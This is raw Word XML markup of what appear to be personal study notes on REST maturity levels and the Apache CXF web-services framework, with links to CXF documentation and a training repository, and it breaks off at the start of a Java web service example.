      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expose Resources with proper URI’s (using nouns). Ex: http://server/accounts, http://server/accounts/10. However, HTTP Methods are not used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Level </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resources use proper URI’s + HTTP Methods. For example, to update an account, you do a PUT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>to .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> The create an account, you do a POST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>to .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uri’s look like posts/1/comments/5 and accounts/1/friends/1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Level </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> HATEOAS (Hypermedia as the engine of application state). You will tell not only about the information being requested but also about the next possible actions that the service consumer can do. When requesting information about a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>facebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, a REST service can return user details along with information about how to get his recent posts, how to get his recent comments and how to retrieve his friend’s list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00016069" w:rsidRDefault="00016069">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016069">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CXF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016069" w:rsidRDefault="004D49A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="00016069" w:rsidRPr="000D211D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00016069" w:rsidRDefault="004D49A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="00016069" w:rsidRPr="000D211D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/docs/configuration.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00016069" w:rsidRDefault="006C16FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A81CF4C" wp14:editId="07423160">
            <wp:extent cx="4448175" cy="2419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8175" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C16FE" w:rsidRDefault="006C16FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Bus is called CXF context and it is responsible for loading configuration file and interacting with other part.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C16FE" w:rsidRDefault="006C16FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>jax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>rs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>jax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> are called as front-end.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E257F" w:rsidRDefault="008E257F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Service model: responsible for </w:t>
      </w:r>
      <w:r w:rsidR="00017368">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">creating and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">loading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>wsdl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> into CFX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA662A" w:rsidRDefault="00EA662A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA662A" w:rsidRDefault="00B81455">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Data </w:t>
      </w:r>
      <w:r w:rsidR="00506085">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>binding:</w:t>
      </w:r>
      <w:r w:rsidR="00EA662A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used in case of conversion or transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00506085" w:rsidRDefault="00506085">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>XMl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to class conversion like JAXB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0F0B" w:rsidRDefault="00592BF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Transport</w:t>
      </w:r>
      <w:r w:rsidR="00CF0F0B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CF0F0B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Soap , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF0F0B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>http,https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF0F0B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007344FF" w:rsidRDefault="007344FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Protocol binding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA662A" w:rsidRDefault="00EA662A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Messaging</w:t>
      </w:r>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>intercerptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you want to </w:t>
      </w:r>
      <w:r w:rsidR="00712D9D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> custom filtering</w:t>
      </w:r>
      <w:r w:rsidR="00540ACB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> (filter in java)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> , like header or message </w:t>
      </w:r>
      <w:r w:rsidR="00712D9D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Want to add some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>header ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>authtication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A73F72">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, preprocessor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA662A" w:rsidRDefault="00EA662A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C16FE" w:rsidRDefault="00C3614E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4B6851" wp14:editId="30B639E3">
            <wp:extent cx="5943600" cy="3043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43555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63AAB" w:rsidRDefault="00D63AAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D63AAB" w:rsidRDefault="004D49A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="00D63AAB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/AvivaFuseVirtualSession2/tree/master</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D63AAB" w:rsidRDefault="00D63AAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A65965B" wp14:editId="184F617F">
            <wp:extent cx="534352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3525" cy="3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3C4E" w:rsidRDefault="005B3C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>For integration CXF is better option as it is having BUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D324A4" w:rsidRDefault="004D49A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="002D6FDD" w:rsidRPr="000D211D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>https://cxf.apache.org/javadoc/latest/org/apache/cxf/transport/http/HTTPSession.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002D6FDD" w:rsidRDefault="00F97F9C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>important</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Aviva</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D6FDD" w:rsidRDefault="002D6FDD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">CXF has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>inbuild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> server support (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>jetty</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>,tomcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97F9C" w:rsidRDefault="00F97F9C" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">How to </w:t>
      </w:r>
      <w:r w:rsidR="005804DD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CXF REST and SOAP (how to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>creat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> producer and consumer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97F9C" w:rsidRDefault="00F97F9C" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Interceptor and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>httpSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00933786" w:rsidRDefault="00933786" w:rsidP="00933786">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Messages concept for running using interceptor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97F9C" w:rsidRDefault="00F97F9C" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1868" w:rsidRDefault="004D49A4" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="004C1868">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/docs/interceptors.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F863BF" w:rsidRDefault="004D49A4" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidR="00F863BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/docs/tools.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00394E4D" w:rsidRDefault="00394E4D" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00394E4D" w:rsidRDefault="00394E4D" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00394E4D" w:rsidRDefault="004D49A4" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidR="00394E4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/AvivaFuseVirtualSession2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00394E4D" w:rsidRDefault="00394E4D" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bC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com.caps</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javax.jws.WebService</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WebService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ChangeStudent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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 xml:space="preserve">Student  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
